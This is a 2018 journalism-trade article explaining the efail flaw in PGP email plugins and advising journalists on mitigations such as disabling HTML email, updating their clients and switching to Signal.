Bad news about Pretty Good Privacy

May 28, 2018
Image: Wikimedia commons

Groans resound in media safety workshops when the lesson on the encryption software, called Pretty Good Privacy, begins. Journalists without tech savvy find the program devilish to master. Eyes glaze as they grapple with the complex keys that scramble and unscramble secret messages.

This is the software that has reigned supreme among whistleblowers and investigative reporters for 30 years, allowing them to communicate privately, without being surveiled. Its popularity exploded after Edward Snowden used a similar method to share his NSA revelations with journalists in 2013.

Even for tech wizards, using the tool can be confusing. Now, it’s gotten more so.

Researchers from Europe recently tricked the most common way to use the system, thereby detecting a flaw in how leading email providers implement PGP. The researchers devised an attack named “efail” that forced Thunderbird, Apple Mail, and others to send them the plain text of encrypted messages. This means journalists should find a safer alternative to PGP email program plugins until a solution emerges.

There are steps you can take to mitigate the risks until the flaw is fixed.

ICYMI: A pivot to Netflix?

Sign up for CJR's daily email

The Electronic Frontier Foundation suggests the most radical approach: disable PGP on email for now. Switch to another type of secure end-to-end messaging, such as Signal.

“We’re not saying stop using PGP forever,” says Eva Galperin, director of security at the organization. “We’re suggesting they hold off while the security industry looks at whether these vulnerabilities have other implications.” Other experts recommend disabling HTML and remote content in email programs, through which the bug can be transmitted.

Put simply, PGP involves keys that allow two parties to jumble text to look something like, 6FG/wgryQ1AQ//X7RZgF+r1Uwwpf and then unscramble it back. If the ploy works properly, no one else can decipher the message.

With efail, an attacker can send an HTML image, such as a picture, that includes a block of ciphertext as part of the image’s URL. Even if the recipient doesn’t read the email or click on it, the email program would automatically decrypt the ciphertext, changing the URL to include the plaintext of the message, and then load that URL, sending the adversary a copy of the decrypted message. The image, in essence, serves as a window to spy through. Shutting off HTML will get rid of that risk, but it will also get rid of the pretty stuff you see on MailChimp and Paperless Post.

That inconvenience should be weighed against the likelihood of surveillance. The threat is particularly worrisome for someone on the radar of, say, the NSA, which has piles of encrypted text stored in Utah.

Micah Lee, The Intercept’s guru on Internet privacy, is one such potential target. He served as the point of entry for Snowden leaks. In order to test efail, Lee sent an email to himself that exploited the vulnerability. Voilà, it worked. The efail decoded the encrypted message. (He goes into detail on Twitter.)

“This would be a cinch for most computer science grad students in the world,” he says. “The vulnerabilities are very big and serious.”

For hardcore users reliant on PGP, dumping the protocol would be “highly impracticable,” Lee adds. It’s too integral to how they work.

Therefore, journalists and their sources who understand the PGP shortcomings should simply exercise more caution. Everyone should stay abreast of updates to their email clients and use the latest versions as they come out. Thunderbird and its Enigmail plug-in have announced partial patches; fixes from others will likely follow.

The Tactical Tech Collective in Berlin advises making sure the people you engage with are updated as well—and evaluate how much whether you can move from PGP to Signal or other instant messaging. Messaging apps are more secure for now, but they have downsides. Signal doesn’t allow users to search for an attachment sent last January. Neither does it allow access to old messages on a new phone. And perhaps more importantly, it exposes telephone numbers, which presents different privacy implications.

Signal is not immune to bugs, either. Earlier this month, researchers discovered that attackers could inject malicious code into the Signal desktop app. Fortunately, developers quickly addressed it. (It’s easier to fix a single developer’s software than the messy world of email, where a ton of clients compete: Gmail, Apple versus Outlook, Blackberry, etc.)

“We don’t have a single piece of advice to give to people,” says Tactical’s Cade Diehm, who leads a project on user privacy. “The number one thing I would say is that when situations like this happen, it’s important not to get too alarmed right away. Vulnerabilities are scary but with them come patches.”

Harlo Holmes, director of newsroom digital security for the Freedom of the Press Foundation, feels all media should use end-to-end encryption, in whatever form most appropriate. It’s wise to get into the habit of hiding data. And a critical mass of users arouses less suspicion among hostile authorities than a few users trying to communicate secretly using the same obscure service.

But the takeaway is that you can never get too comfortable with any type of software, even if it’s proved reliable until now. Whatever you deploy, you have to stay on top of developments, and constantly compare the latest information.

“Things can change at the drop of a hat,” Holmes warns.

ICYMI: Are bots entitled to free speech?

Judith Matloff teaches conflict reporting at Columbia's Graduate School of Journalism. She's the author of two books on conflict, Fragments of a Forgotten War and No Friends But the Mountains, as well as a manual for journalists covering dangerous stories, How to Drag a Body.